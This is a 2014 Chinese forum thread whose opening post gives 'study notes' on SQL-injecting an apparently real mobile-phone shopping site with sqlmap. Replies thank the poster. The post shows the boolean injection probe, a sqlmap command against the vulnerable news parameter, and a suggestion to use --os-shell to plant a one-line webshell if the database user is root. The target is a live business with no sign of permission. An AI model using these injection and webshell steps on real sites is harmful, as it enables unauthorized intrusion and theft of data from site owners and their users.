Ky.Mast 发表于 2014-11-13 14:48:41

学习笔记-Sqlmap注入丫丫手机商城

学习笔记-Sqlmap注入丫丫手机商城
第二天学习sqlmap了,昨晚上对KALI的奋斗实在是蛋疼,不过让我对简单的注入语句更加熟练了,下面是个学习例子。
目标:www.XXXX.com
打码了,各位不要轮训了 太可怕了天朝~~,没技术含量 更没最终的shell,后台屏蔽~
word文档格式,懒得排版了
0x1
注入点:http://www.XXX.com/news/specials.php?nid=10028
And 1=1 返回正常 and 1=2 返回错误
扔进sqlmap,神器里面开始注射精子~~[我有点淫荡了,可能是因为光棍节问题]
查看数据库用户 DBMS是数据库mysql5.0
Sqlmap.py –u “http://www.XXX.com/news/specials.php?nid=10028” –current-user
如果是root的话,可以考虑爆路径,然后—os-shell写一句话进去 这里不是,略过…


**** Hidden Message *****

邪恶的孩子2 发表于 2014-11-13 15:35:58

看看,支持原创

乐生乐道 发表于 2014-11-13 15:54:47

支持原创,看看

rabit2013 发表于 2014-11-13 16:32:52

神风 发表于 2014-11-13 17:29:16

支持一下。

冰锐 发表于 2014-11-13 19:31:44

谢谢分享

member 发表于 2014-11-13 22:50:27

感谢分享.拿走学习了

490589699 发表于 2014-11-14 01:58:50

学习下。。。。

suifeng3 发表于 2014-11-14 09:28:27

正好学习一下sqlmap

yooz 发表于 2014-11-14 12:35:49

谢谢分享啊
页: [1] 2 3 4 5 6 7 8
查看完整版本: 学习笔记-Sqlmap注入丫丫手机商城